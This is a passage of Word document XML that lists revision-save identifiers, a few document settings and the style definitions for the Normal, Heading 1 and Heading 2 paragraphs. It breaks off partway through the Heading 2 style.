    <w:rsid w:val="009F1D3C"/>
    <w:rsid w:val="009F2AC0"/>
    <w:rsid w:val="009F2D8A"/>
    <w:rsid w:val="009F4371"/>
    <w:rsid w:val="009F4FA8"/>
    <w:rsid w:val="009F5AD1"/>
    <w:rsid w:val="009F622C"/>
    <w:rsid w:val="009F675B"/>
    <w:rsid w:val="009F741A"/>
    <w:rsid w:val="00A00075"/>
    <w:rsid w:val="00A013EE"/>
    <w:rsid w:val="00A016E5"/>
    <w:rsid w:val="00A07A65"/>
    <w:rsid w:val="00A12BE0"/>
    <w:rsid w:val="00A13398"/>
    <w:rsid w:val="00A1347D"/>
    <w:rsid w:val="00A1543F"/>
    <w:rsid w:val="00A155B5"/>
    <w:rsid w:val="00A16A29"/>
    <w:rsid w:val="00A17FDF"/>
    <w:rsid w:val="00A20835"/>
    <w:rsid w:val="00A22FAC"/>
    <w:rsid w:val="00A23CD9"/>
    <w:rsid w:val="00A27E5E"/>
    <w:rsid w:val="00A30324"/>
    <w:rsid w:val="00A303DD"/>
    <w:rsid w:val="00A309E6"/>
    <w:rsid w:val="00A314D8"/>
    <w:rsid w:val="00A31908"/>
    <w:rsid w:val="00A32FF3"/>
    <w:rsid w:val="00A33016"/>
    <w:rsid w:val="00A33E72"/>
    <w:rsid w:val="00A358DB"/>
    <w:rsid w:val="00A35D70"/>
    <w:rsid w:val="00A37316"/>
    <w:rsid w:val="00A41C98"/>
    <w:rsid w:val="00A43A74"/>
    <w:rsid w:val="00A44BEF"/>
    <w:rsid w:val="00A476DD"/>
    <w:rsid w:val="00A50FFC"/>
    <w:rsid w:val="00A54C75"/>
    <w:rsid w:val="00A54EEF"/>
    <w:rsid w:val="00A55B2E"/>
    <w:rsid w:val="00A55C38"/>
    <w:rsid w:val="00A57807"/>
    <w:rsid w:val="00A60E02"/>
    <w:rsid w:val="00A6110B"/>
    <w:rsid w:val="00A61BE2"/>
    <w:rsid w:val="00A62DE5"/>
    <w:rsid w:val="00A62E05"/>
    <w:rsid w:val="00A64FA3"/>
    <w:rsid w:val="00A66E7B"/>
    <w:rsid w:val="00A70BBE"/>
    <w:rsid w:val="00A70C15"/>
    <w:rsid w:val="00A70E0F"/>
    <w:rsid w:val="00A73A1A"/>
    <w:rsid w:val="00A73B5E"/>
    <w:rsid w:val="00A775B0"/>
    <w:rsid w:val="00A77C1E"/>
    <w:rsid w:val="00A8072B"/>
    <w:rsid w:val="00A81109"/>
    <w:rsid w:val="00A812BD"/>
    <w:rsid w:val="00A83BE0"/>
    <w:rsid w:val="00A86B5E"/>
    <w:rsid w:val="00A86FEA"/>
    <w:rsid w:val="00A87DBC"/>
    <w:rsid w:val="00A93D57"/>
    <w:rsid w:val="00A94D53"/>
    <w:rsid w:val="00A94F78"/>
    <w:rsid w:val="00A96C2C"/>
    <w:rsid w:val="00AA048E"/>
    <w:rsid w:val="00AA3174"/>
    <w:rsid w:val="00AA3238"/>
    <w:rsid w:val="00AA4A4A"/>
    <w:rsid w:val="00AA63E4"/>
    <w:rsid w:val="00AA700F"/>
    <w:rsid w:val="00AA72E9"/>
    <w:rsid w:val="00AB1794"/>
    <w:rsid w:val="00AB48BF"/>
    <w:rsid w:val="00AB4D90"/>
    <w:rsid w:val="00AB59A7"/>
    <w:rsid w:val="00AB5BA3"/>
    <w:rsid w:val="00AB784E"/>
    <w:rsid w:val="00AC18B5"/>
    <w:rsid w:val="00AC232D"/>
    <w:rsid w:val="00AC2403"/>
    <w:rsid w:val="00AC51F0"/>
    <w:rsid w:val="00AC5D7F"/>
    <w:rsid w:val="00AC6B61"/>
    <w:rsid w:val="00AC6BD3"/>
    <w:rsid w:val="00AD29EA"/>
    <w:rsid w:val="00AD2BC8"/>
    <w:rsid w:val="00AD2F97"/>
    <w:rsid w:val="00AD391B"/>
    <w:rsid w:val="00AD3B37"/>
    <w:rsid w:val="00AD54B9"/>
    <w:rsid w:val="00AD6668"/>
    <w:rsid w:val="00AD7201"/>
    <w:rsid w:val="00AE119F"/>
    <w:rsid w:val="00AE333F"/>
    <w:rsid w:val="00AE3768"/>
    <w:rsid w:val="00AE3935"/>
    <w:rsid w:val="00AE66AB"/>
    <w:rsid w:val="00AE7135"/>
    <w:rsid w:val="00AE7467"/>
    <w:rsid w:val="00AF35F0"/>
    <w:rsid w:val="00AF6160"/>
    <w:rsid w:val="00B00450"/>
    <w:rsid w:val="00B010FA"/>
    <w:rsid w:val="00B05BAC"/>
    <w:rsid w:val="00B072CE"/>
    <w:rsid w:val="00B07760"/>
    <w:rsid w:val="00B100A7"/>
    <w:rsid w:val="00B10B24"/>
    <w:rsid w:val="00B1472E"/>
    <w:rsid w:val="00B1511D"/>
    <w:rsid w:val="00B173C0"/>
    <w:rsid w:val="00B202D0"/>
    <w:rsid w:val="00B20926"/>
    <w:rsid w:val="00B21EC2"/>
    <w:rsid w:val="00B24A6A"/>
    <w:rsid w:val="00B25BE7"/>
    <w:rsid w:val="00B27E84"/>
    <w:rsid w:val="00B31EA5"/>
    <w:rsid w:val="00B338E1"/>
    <w:rsid w:val="00B33B5A"/>
    <w:rsid w:val="00B371D9"/>
    <w:rsid w:val="00B37843"/>
    <w:rsid w:val="00B41B22"/>
    <w:rsid w:val="00B41F31"/>
    <w:rsid w:val="00B41F36"/>
    <w:rsid w:val="00B437CB"/>
    <w:rsid w:val="00B43D00"/>
    <w:rsid w:val="00B45E6A"/>
    <w:rsid w:val="00B46366"/>
    <w:rsid w:val="00B50984"/>
    <w:rsid w:val="00B51590"/>
    <w:rsid w:val="00B52069"/>
    <w:rsid w:val="00B52401"/>
    <w:rsid w:val="00B531AE"/>
    <w:rsid w:val="00B54981"/>
    <w:rsid w:val="00B5588B"/>
    <w:rsid w:val="00B560AC"/>
    <w:rsid w:val="00B5698D"/>
    <w:rsid w:val="00B60156"/>
    <w:rsid w:val="00B60358"/>
    <w:rsid w:val="00B6096E"/>
    <w:rsid w:val="00B6098D"/>
    <w:rsid w:val="00B61633"/>
    <w:rsid w:val="00B63D14"/>
    <w:rsid w:val="00B641BD"/>
    <w:rsid w:val="00B64403"/>
    <w:rsid w:val="00B674DB"/>
    <w:rsid w:val="00B67BBD"/>
    <w:rsid w:val="00B72F81"/>
    <w:rsid w:val="00B7366F"/>
    <w:rsid w:val="00B737BA"/>
    <w:rsid w:val="00B74798"/>
    <w:rsid w:val="00B7526B"/>
    <w:rsid w:val="00B758D5"/>
    <w:rsid w:val="00B76EE3"/>
    <w:rsid w:val="00B77761"/>
    <w:rsid w:val="00B77B56"/>
    <w:rsid w:val="00B82AF4"/>
    <w:rsid w:val="00B83667"/>
    <w:rsid w:val="00B85249"/>
    <w:rsid w:val="00B86043"/>
    <w:rsid w:val="00B875AA"/>
    <w:rsid w:val="00B9036C"/>
    <w:rsid w:val="00B90F4B"/>
    <w:rsid w:val="00B90F69"/>
    <w:rsid w:val="00B91778"/>
    <w:rsid w:val="00B94D6B"/>
    <w:rsid w:val="00B95ECD"/>
    <w:rsid w:val="00B978BD"/>
    <w:rsid w:val="00BA0391"/>
    <w:rsid w:val="00BA10DC"/>
    <w:rsid w:val="00BA1EDF"/>
    <w:rsid w:val="00BA223B"/>
    <w:rsid w:val="00BA2366"/>
    <w:rsid w:val="00BA2655"/>
    <w:rsid w:val="00BA2CCF"/>
    <w:rsid w:val="00BA3BA8"/>
    <w:rsid w:val="00BA61AC"/>
    <w:rsid w:val="00BA68A6"/>
    <w:rsid w:val="00BA6E35"/>
    <w:rsid w:val="00BA7690"/>
    <w:rsid w:val="00BB096B"/>
    <w:rsid w:val="00BB11E9"/>
    <w:rsid w:val="00BB1BE0"/>
    <w:rsid w:val="00BB205F"/>
    <w:rsid w:val="00BB2928"/>
    <w:rsid w:val="00BB29B2"/>
    <w:rsid w:val="00BB3F79"/>
    <w:rsid w:val="00BB413B"/>
    <w:rsid w:val="00BB5D79"/>
    <w:rsid w:val="00BB6D6B"/>
    <w:rsid w:val="00BC0805"/>
    <w:rsid w:val="00BC0EA1"/>
    <w:rsid w:val="00BC2128"/>
    <w:rsid w:val="00BC239C"/>
    <w:rsid w:val="00BC2ADA"/>
    <w:rsid w:val="00BC3B77"/>
    <w:rsid w:val="00BC4E47"/>
    <w:rsid w:val="00BC55A7"/>
    <w:rsid w:val="00BC5678"/>
    <w:rsid w:val="00BC5EF0"/>
    <w:rsid w:val="00BC6061"/>
    <w:rsid w:val="00BD0C79"/>
    <w:rsid w:val="00BD17A6"/>
    <w:rsid w:val="00BD1B79"/>
    <w:rsid w:val="00BD29E1"/>
    <w:rsid w:val="00BD3B9C"/>
    <w:rsid w:val="00BD60C6"/>
    <w:rsid w:val="00BD66D0"/>
    <w:rsid w:val="00BD6B13"/>
    <w:rsid w:val="00BE0431"/>
    <w:rsid w:val="00BE17B0"/>
    <w:rsid w:val="00BE4149"/>
    <w:rsid w:val="00BE7A12"/>
    <w:rsid w:val="00BF0527"/>
    <w:rsid w:val="00BF22F3"/>
    <w:rsid w:val="00BF3121"/>
    <w:rsid w:val="00BF42E7"/>
    <w:rsid w:val="00BF5086"/>
    <w:rsid w:val="00BF5315"/>
    <w:rsid w:val="00BF5720"/>
    <w:rsid w:val="00BF5BA6"/>
    <w:rsid w:val="00BF6AE3"/>
    <w:rsid w:val="00C027B4"/>
    <w:rsid w:val="00C04320"/>
    <w:rsid w:val="00C05409"/>
    <w:rsid w:val="00C0567A"/>
    <w:rsid w:val="00C07D52"/>
    <w:rsid w:val="00C1149E"/>
    <w:rsid w:val="00C1160E"/>
    <w:rsid w:val="00C11E32"/>
    <w:rsid w:val="00C1320F"/>
    <w:rsid w:val="00C13593"/>
    <w:rsid w:val="00C13E12"/>
    <w:rsid w:val="00C1444F"/>
    <w:rsid w:val="00C14C49"/>
    <w:rsid w:val="00C15D56"/>
    <w:rsid w:val="00C16DFF"/>
    <w:rsid w:val="00C17178"/>
    <w:rsid w:val="00C204CA"/>
    <w:rsid w:val="00C20FAB"/>
    <w:rsid w:val="00C21E4E"/>
    <w:rsid w:val="00C235DA"/>
    <w:rsid w:val="00C2451F"/>
    <w:rsid w:val="00C24BD8"/>
    <w:rsid w:val="00C25242"/>
    <w:rsid w:val="00C30654"/>
    <w:rsid w:val="00C32100"/>
    <w:rsid w:val="00C33348"/>
    <w:rsid w:val="00C34729"/>
    <w:rsid w:val="00C361B0"/>
    <w:rsid w:val="00C3684B"/>
    <w:rsid w:val="00C374FB"/>
    <w:rsid w:val="00C423E2"/>
    <w:rsid w:val="00C42432"/>
    <w:rsid w:val="00C430ED"/>
    <w:rsid w:val="00C43A1F"/>
    <w:rsid w:val="00C458F1"/>
    <w:rsid w:val="00C46BF3"/>
    <w:rsid w:val="00C50B90"/>
    <w:rsid w:val="00C529BB"/>
    <w:rsid w:val="00C5344B"/>
    <w:rsid w:val="00C534BD"/>
    <w:rsid w:val="00C540B9"/>
    <w:rsid w:val="00C54E89"/>
    <w:rsid w:val="00C5554E"/>
    <w:rsid w:val="00C5798B"/>
    <w:rsid w:val="00C604A0"/>
    <w:rsid w:val="00C6187E"/>
    <w:rsid w:val="00C62258"/>
    <w:rsid w:val="00C62310"/>
    <w:rsid w:val="00C625D8"/>
    <w:rsid w:val="00C628E1"/>
    <w:rsid w:val="00C62991"/>
    <w:rsid w:val="00C62AA7"/>
    <w:rsid w:val="00C63988"/>
    <w:rsid w:val="00C64523"/>
    <w:rsid w:val="00C64AE5"/>
    <w:rsid w:val="00C66444"/>
    <w:rsid w:val="00C670F4"/>
    <w:rsid w:val="00C677F0"/>
    <w:rsid w:val="00C67EB5"/>
    <w:rsid w:val="00C7036C"/>
    <w:rsid w:val="00C705A3"/>
    <w:rsid w:val="00C7199C"/>
    <w:rsid w:val="00C7343B"/>
    <w:rsid w:val="00C73D5D"/>
    <w:rsid w:val="00C7464B"/>
    <w:rsid w:val="00C74A03"/>
    <w:rsid w:val="00C74C3A"/>
    <w:rsid w:val="00C7515B"/>
    <w:rsid w:val="00C76D65"/>
    <w:rsid w:val="00C816C4"/>
    <w:rsid w:val="00C81C8A"/>
    <w:rsid w:val="00C829E2"/>
    <w:rsid w:val="00C85078"/>
    <w:rsid w:val="00C8602A"/>
    <w:rsid w:val="00C8761E"/>
    <w:rsid w:val="00C90992"/>
    <w:rsid w:val="00C90AE0"/>
    <w:rsid w:val="00C90F53"/>
    <w:rsid w:val="00C91294"/>
    <w:rsid w:val="00C918E2"/>
    <w:rsid w:val="00C92CCB"/>
    <w:rsid w:val="00C93A93"/>
    <w:rsid w:val="00C9423D"/>
    <w:rsid w:val="00C95E49"/>
    <w:rsid w:val="00C97042"/>
    <w:rsid w:val="00C971A9"/>
    <w:rsid w:val="00CA01EA"/>
    <w:rsid w:val="00CA022F"/>
    <w:rsid w:val="00CA0D2D"/>
    <w:rsid w:val="00CA4831"/>
    <w:rsid w:val="00CA6EDD"/>
    <w:rsid w:val="00CB06BF"/>
    <w:rsid w:val="00CB1DF6"/>
    <w:rsid w:val="00CB2B80"/>
    <w:rsid w:val="00CB352E"/>
    <w:rsid w:val="00CB41AE"/>
    <w:rsid w:val="00CB58A7"/>
    <w:rsid w:val="00CB79D3"/>
    <w:rsid w:val="00CB7C01"/>
    <w:rsid w:val="00CC0B8A"/>
    <w:rsid w:val="00CC1C91"/>
    <w:rsid w:val="00CC30D6"/>
    <w:rsid w:val="00CC40ED"/>
    <w:rsid w:val="00CC4A25"/>
    <w:rsid w:val="00CC5416"/>
    <w:rsid w:val="00CC687C"/>
    <w:rsid w:val="00CC6C2B"/>
    <w:rsid w:val="00CD2182"/>
    <w:rsid w:val="00CD33B9"/>
    <w:rsid w:val="00CD3FDD"/>
    <w:rsid w:val="00CD4930"/>
    <w:rsid w:val="00CD4D20"/>
    <w:rsid w:val="00CD6469"/>
    <w:rsid w:val="00CD6B26"/>
    <w:rsid w:val="00CD7607"/>
    <w:rsid w:val="00CE04D0"/>
    <w:rsid w:val="00CE05CE"/>
    <w:rsid w:val="00CE19D0"/>
    <w:rsid w:val="00CE1F6A"/>
    <w:rsid w:val="00CE2242"/>
    <w:rsid w:val="00CE27D8"/>
    <w:rsid w:val="00CE3AEF"/>
    <w:rsid w:val="00CE4EC6"/>
    <w:rsid w:val="00CE576D"/>
    <w:rsid w:val="00CE587B"/>
    <w:rsid w:val="00CE67BD"/>
    <w:rsid w:val="00CE6905"/>
    <w:rsid w:val="00CF1304"/>
    <w:rsid w:val="00CF3A87"/>
    <w:rsid w:val="00CF3CFF"/>
    <w:rsid w:val="00CF56BB"/>
    <w:rsid w:val="00CF65E6"/>
    <w:rsid w:val="00CF77E7"/>
    <w:rsid w:val="00D0045C"/>
    <w:rsid w:val="00D015BD"/>
    <w:rsid w:val="00D02B92"/>
    <w:rsid w:val="00D02E3D"/>
    <w:rsid w:val="00D049C5"/>
    <w:rsid w:val="00D04BD5"/>
    <w:rsid w:val="00D04E69"/>
    <w:rsid w:val="00D051B2"/>
    <w:rsid w:val="00D05EB2"/>
    <w:rsid w:val="00D070D8"/>
    <w:rsid w:val="00D0732A"/>
    <w:rsid w:val="00D075CF"/>
    <w:rsid w:val="00D102DD"/>
    <w:rsid w:val="00D108DB"/>
    <w:rsid w:val="00D10AD0"/>
    <w:rsid w:val="00D10CE1"/>
    <w:rsid w:val="00D119DC"/>
    <w:rsid w:val="00D11BB0"/>
    <w:rsid w:val="00D1230E"/>
    <w:rsid w:val="00D12CE7"/>
    <w:rsid w:val="00D13325"/>
    <w:rsid w:val="00D134CF"/>
    <w:rsid w:val="00D13E9E"/>
    <w:rsid w:val="00D13F4E"/>
    <w:rsid w:val="00D14A89"/>
    <w:rsid w:val="00D17057"/>
    <w:rsid w:val="00D17102"/>
    <w:rsid w:val="00D205B3"/>
    <w:rsid w:val="00D23887"/>
    <w:rsid w:val="00D2566E"/>
    <w:rsid w:val="00D263A8"/>
    <w:rsid w:val="00D263E1"/>
    <w:rsid w:val="00D27201"/>
    <w:rsid w:val="00D300D6"/>
    <w:rsid w:val="00D3297C"/>
    <w:rsid w:val="00D332CD"/>
    <w:rsid w:val="00D35704"/>
    <w:rsid w:val="00D35E01"/>
    <w:rsid w:val="00D37CC7"/>
    <w:rsid w:val="00D4051D"/>
    <w:rsid w:val="00D41E98"/>
    <w:rsid w:val="00D41FFD"/>
    <w:rsid w:val="00D42DC8"/>
    <w:rsid w:val="00D449FD"/>
    <w:rsid w:val="00D453B2"/>
    <w:rsid w:val="00D46022"/>
    <w:rsid w:val="00D47319"/>
    <w:rsid w:val="00D51EC2"/>
    <w:rsid w:val="00D535DA"/>
    <w:rsid w:val="00D536C4"/>
    <w:rsid w:val="00D54007"/>
    <w:rsid w:val="00D559CE"/>
    <w:rsid w:val="00D61756"/>
    <w:rsid w:val="00D617AC"/>
    <w:rsid w:val="00D638A2"/>
    <w:rsid w:val="00D63E36"/>
    <w:rsid w:val="00D64096"/>
    <w:rsid w:val="00D663E9"/>
    <w:rsid w:val="00D664FF"/>
    <w:rsid w:val="00D66EF8"/>
    <w:rsid w:val="00D714B1"/>
    <w:rsid w:val="00D71A5C"/>
    <w:rsid w:val="00D73023"/>
    <w:rsid w:val="00D73889"/>
    <w:rsid w:val="00D748CA"/>
    <w:rsid w:val="00D75247"/>
    <w:rsid w:val="00D802C9"/>
    <w:rsid w:val="00D80883"/>
    <w:rsid w:val="00D80AAA"/>
    <w:rsid w:val="00D80B48"/>
    <w:rsid w:val="00D81D2E"/>
    <w:rsid w:val="00D831EA"/>
    <w:rsid w:val="00D839F2"/>
    <w:rsid w:val="00D84B8C"/>
    <w:rsid w:val="00D85B5A"/>
    <w:rsid w:val="00D90472"/>
    <w:rsid w:val="00D94E2E"/>
    <w:rsid w:val="00D9594D"/>
    <w:rsid w:val="00D96951"/>
    <w:rsid w:val="00DA2E18"/>
    <w:rsid w:val="00DA41E9"/>
    <w:rsid w:val="00DA492D"/>
    <w:rsid w:val="00DA4DB9"/>
    <w:rsid w:val="00DA5460"/>
    <w:rsid w:val="00DB09EE"/>
    <w:rsid w:val="00DB125B"/>
    <w:rsid w:val="00DB40BE"/>
    <w:rsid w:val="00DB581E"/>
    <w:rsid w:val="00DB6695"/>
    <w:rsid w:val="00DB6DC1"/>
    <w:rsid w:val="00DB70C6"/>
    <w:rsid w:val="00DB7310"/>
    <w:rsid w:val="00DC0FCA"/>
    <w:rsid w:val="00DC39A3"/>
    <w:rsid w:val="00DC3BCA"/>
    <w:rsid w:val="00DC5024"/>
    <w:rsid w:val="00DC65B5"/>
    <w:rsid w:val="00DC6C29"/>
    <w:rsid w:val="00DC707E"/>
    <w:rsid w:val="00DD18F4"/>
    <w:rsid w:val="00DD29F0"/>
    <w:rsid w:val="00DD4DC5"/>
    <w:rsid w:val="00DD5C37"/>
    <w:rsid w:val="00DE1BF6"/>
    <w:rsid w:val="00DE2481"/>
    <w:rsid w:val="00DE2821"/>
    <w:rsid w:val="00DE2D77"/>
    <w:rsid w:val="00DE412F"/>
    <w:rsid w:val="00DE5045"/>
    <w:rsid w:val="00DF48F2"/>
    <w:rsid w:val="00DF6FAC"/>
    <w:rsid w:val="00DF7A76"/>
    <w:rsid w:val="00E015EC"/>
    <w:rsid w:val="00E0349A"/>
    <w:rsid w:val="00E03537"/>
    <w:rsid w:val="00E04F0D"/>
    <w:rsid w:val="00E05387"/>
    <w:rsid w:val="00E07FCD"/>
    <w:rsid w:val="00E1087B"/>
    <w:rsid w:val="00E109CC"/>
    <w:rsid w:val="00E10F49"/>
    <w:rsid w:val="00E116EC"/>
    <w:rsid w:val="00E127DB"/>
    <w:rsid w:val="00E1495E"/>
    <w:rsid w:val="00E14C35"/>
    <w:rsid w:val="00E15982"/>
    <w:rsid w:val="00E1714A"/>
    <w:rsid w:val="00E17E04"/>
    <w:rsid w:val="00E2140E"/>
    <w:rsid w:val="00E23390"/>
    <w:rsid w:val="00E236DC"/>
    <w:rsid w:val="00E24756"/>
    <w:rsid w:val="00E258FB"/>
    <w:rsid w:val="00E268A7"/>
    <w:rsid w:val="00E30885"/>
    <w:rsid w:val="00E31CB6"/>
    <w:rsid w:val="00E321B6"/>
    <w:rsid w:val="00E332BB"/>
    <w:rsid w:val="00E34AB7"/>
    <w:rsid w:val="00E35D57"/>
    <w:rsid w:val="00E36164"/>
    <w:rsid w:val="00E37398"/>
    <w:rsid w:val="00E375BA"/>
    <w:rsid w:val="00E40803"/>
    <w:rsid w:val="00E41545"/>
    <w:rsid w:val="00E43194"/>
    <w:rsid w:val="00E43735"/>
    <w:rsid w:val="00E4490E"/>
    <w:rsid w:val="00E45166"/>
    <w:rsid w:val="00E4626D"/>
    <w:rsid w:val="00E5205F"/>
    <w:rsid w:val="00E53CA5"/>
    <w:rsid w:val="00E549D5"/>
    <w:rsid w:val="00E551D1"/>
    <w:rsid w:val="00E556DF"/>
    <w:rsid w:val="00E560E1"/>
    <w:rsid w:val="00E570BF"/>
    <w:rsid w:val="00E57183"/>
    <w:rsid w:val="00E57FD3"/>
    <w:rsid w:val="00E6180B"/>
    <w:rsid w:val="00E62B50"/>
    <w:rsid w:val="00E63CD3"/>
    <w:rsid w:val="00E6487F"/>
    <w:rsid w:val="00E65C2D"/>
    <w:rsid w:val="00E7006D"/>
    <w:rsid w:val="00E711BC"/>
    <w:rsid w:val="00E76202"/>
    <w:rsid w:val="00E768EF"/>
    <w:rsid w:val="00E76B01"/>
    <w:rsid w:val="00E810BB"/>
    <w:rsid w:val="00E811BA"/>
    <w:rsid w:val="00E8238D"/>
    <w:rsid w:val="00E836A2"/>
    <w:rsid w:val="00E8428B"/>
    <w:rsid w:val="00E84393"/>
    <w:rsid w:val="00E844FF"/>
    <w:rsid w:val="00E848E2"/>
    <w:rsid w:val="00E849B5"/>
    <w:rsid w:val="00E84C90"/>
    <w:rsid w:val="00E84D54"/>
    <w:rsid w:val="00E858C1"/>
    <w:rsid w:val="00E8662D"/>
    <w:rsid w:val="00E86B54"/>
    <w:rsid w:val="00E9064D"/>
    <w:rsid w:val="00E90AE9"/>
    <w:rsid w:val="00E92E9A"/>
    <w:rsid w:val="00E937B4"/>
    <w:rsid w:val="00E9457A"/>
    <w:rsid w:val="00E947E4"/>
    <w:rsid w:val="00E94BBA"/>
    <w:rsid w:val="00E972CE"/>
    <w:rsid w:val="00EA0057"/>
    <w:rsid w:val="00EA2B78"/>
    <w:rsid w:val="00EA2D57"/>
    <w:rsid w:val="00EA3DBC"/>
    <w:rsid w:val="00EB02FE"/>
    <w:rsid w:val="00EB12DE"/>
    <w:rsid w:val="00EB29FA"/>
    <w:rsid w:val="00EB3ECA"/>
    <w:rsid w:val="00EB71CF"/>
    <w:rsid w:val="00EC3170"/>
    <w:rsid w:val="00EC5D45"/>
    <w:rsid w:val="00EC691D"/>
    <w:rsid w:val="00EC7A16"/>
    <w:rsid w:val="00ED1E59"/>
    <w:rsid w:val="00ED24E8"/>
    <w:rsid w:val="00ED2BDF"/>
    <w:rsid w:val="00ED574F"/>
    <w:rsid w:val="00ED5D24"/>
    <w:rsid w:val="00ED68C4"/>
    <w:rsid w:val="00EE1BF8"/>
    <w:rsid w:val="00EE309B"/>
    <w:rsid w:val="00EE48F3"/>
    <w:rsid w:val="00EE552B"/>
    <w:rsid w:val="00EE553C"/>
    <w:rsid w:val="00EE5919"/>
    <w:rsid w:val="00EE7B1A"/>
    <w:rsid w:val="00EF1A66"/>
    <w:rsid w:val="00EF1CEA"/>
    <w:rsid w:val="00EF2A22"/>
    <w:rsid w:val="00EF3E52"/>
    <w:rsid w:val="00EF4FE6"/>
    <w:rsid w:val="00EF574F"/>
    <w:rsid w:val="00EF6FA0"/>
    <w:rsid w:val="00F00363"/>
    <w:rsid w:val="00F0186E"/>
    <w:rsid w:val="00F01BD5"/>
    <w:rsid w:val="00F032B6"/>
    <w:rsid w:val="00F0333E"/>
    <w:rsid w:val="00F0337B"/>
    <w:rsid w:val="00F057FB"/>
    <w:rsid w:val="00F05AAE"/>
    <w:rsid w:val="00F066AA"/>
    <w:rsid w:val="00F07070"/>
    <w:rsid w:val="00F11222"/>
    <w:rsid w:val="00F11755"/>
    <w:rsid w:val="00F125B5"/>
    <w:rsid w:val="00F126F2"/>
    <w:rsid w:val="00F1346B"/>
    <w:rsid w:val="00F15B15"/>
    <w:rsid w:val="00F2092B"/>
    <w:rsid w:val="00F21D20"/>
    <w:rsid w:val="00F225D0"/>
    <w:rsid w:val="00F23744"/>
    <w:rsid w:val="00F25E6B"/>
    <w:rsid w:val="00F27F97"/>
    <w:rsid w:val="00F307E4"/>
    <w:rsid w:val="00F34697"/>
    <w:rsid w:val="00F366D4"/>
    <w:rsid w:val="00F37B8E"/>
    <w:rsid w:val="00F47144"/>
    <w:rsid w:val="00F51DB8"/>
    <w:rsid w:val="00F528E1"/>
    <w:rsid w:val="00F52F49"/>
    <w:rsid w:val="00F534EB"/>
    <w:rsid w:val="00F553B0"/>
    <w:rsid w:val="00F5587F"/>
    <w:rsid w:val="00F55A19"/>
    <w:rsid w:val="00F561B1"/>
    <w:rsid w:val="00F56295"/>
    <w:rsid w:val="00F56856"/>
    <w:rsid w:val="00F57A2E"/>
    <w:rsid w:val="00F60E39"/>
    <w:rsid w:val="00F621BA"/>
    <w:rsid w:val="00F62D8C"/>
    <w:rsid w:val="00F63D9A"/>
    <w:rsid w:val="00F65B65"/>
    <w:rsid w:val="00F6682A"/>
    <w:rsid w:val="00F713B2"/>
    <w:rsid w:val="00F719E0"/>
    <w:rsid w:val="00F71E17"/>
    <w:rsid w:val="00F723B9"/>
    <w:rsid w:val="00F73DEA"/>
    <w:rsid w:val="00F7516C"/>
    <w:rsid w:val="00F75623"/>
    <w:rsid w:val="00F75FEC"/>
    <w:rsid w:val="00F766A3"/>
    <w:rsid w:val="00F7712B"/>
    <w:rsid w:val="00F77D76"/>
    <w:rsid w:val="00F800B1"/>
    <w:rsid w:val="00F80E87"/>
    <w:rsid w:val="00F81013"/>
    <w:rsid w:val="00F849D1"/>
    <w:rsid w:val="00F90691"/>
    <w:rsid w:val="00F90DA1"/>
    <w:rsid w:val="00F91723"/>
    <w:rsid w:val="00F91B8E"/>
    <w:rsid w:val="00F921B4"/>
    <w:rsid w:val="00F92E47"/>
    <w:rsid w:val="00F9306B"/>
    <w:rsid w:val="00F97047"/>
    <w:rsid w:val="00FA0021"/>
    <w:rsid w:val="00FA0705"/>
    <w:rsid w:val="00FA1D4C"/>
    <w:rsid w:val="00FA1F61"/>
    <w:rsid w:val="00FA3F75"/>
    <w:rsid w:val="00FA515A"/>
    <w:rsid w:val="00FB2E13"/>
    <w:rsid w:val="00FB4573"/>
    <w:rsid w:val="00FB5CD7"/>
    <w:rsid w:val="00FB6A28"/>
    <w:rsid w:val="00FB724C"/>
    <w:rsid w:val="00FC07A2"/>
    <w:rsid w:val="00FC0BDC"/>
    <w:rsid w:val="00FC1B73"/>
    <w:rsid w:val="00FC2186"/>
    <w:rsid w:val="00FC36AB"/>
    <w:rsid w:val="00FC3FF2"/>
    <w:rsid w:val="00FC4CA7"/>
    <w:rsid w:val="00FC7308"/>
    <w:rsid w:val="00FC7BC9"/>
    <w:rsid w:val="00FC7EA1"/>
    <w:rsid w:val="00FD0856"/>
    <w:rsid w:val="00FD22DD"/>
    <w:rsid w:val="00FD238A"/>
    <w:rsid w:val="00FD26B8"/>
    <w:rsid w:val="00FD2BED"/>
    <w:rsid w:val="00FD2E3A"/>
    <w:rsid w:val="00FD442F"/>
    <w:rsid w:val="00FD4951"/>
    <w:rsid w:val="00FD709B"/>
    <w:rsid w:val="00FD7A0D"/>
    <w:rsid w:val="00FE0644"/>
    <w:rsid w:val="00FE0AF8"/>
    <w:rsid w:val="00FE49CC"/>
    <w:rsid w:val="00FE60AA"/>
    <w:rsid w:val="00FE6160"/>
    <w:rsid w:val="00FE72E2"/>
    <w:rsid w:val="00FE7BFE"/>
    <w:rsid w:val="00FF116C"/>
    <w:rsid w:val="00FF2149"/>
    <w:rsid w:val="00FF4EA5"/>
    <w:rsid w:val="00FF5C82"/>
    <w:rsid w:val="00FF6C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79FAE"/>
  <w14:defaultImageDpi w14:val="150"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{892CC81C-4730-41F4-ADED-B59FAD50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5DA"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="007606A2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="BC161C"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003F748C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
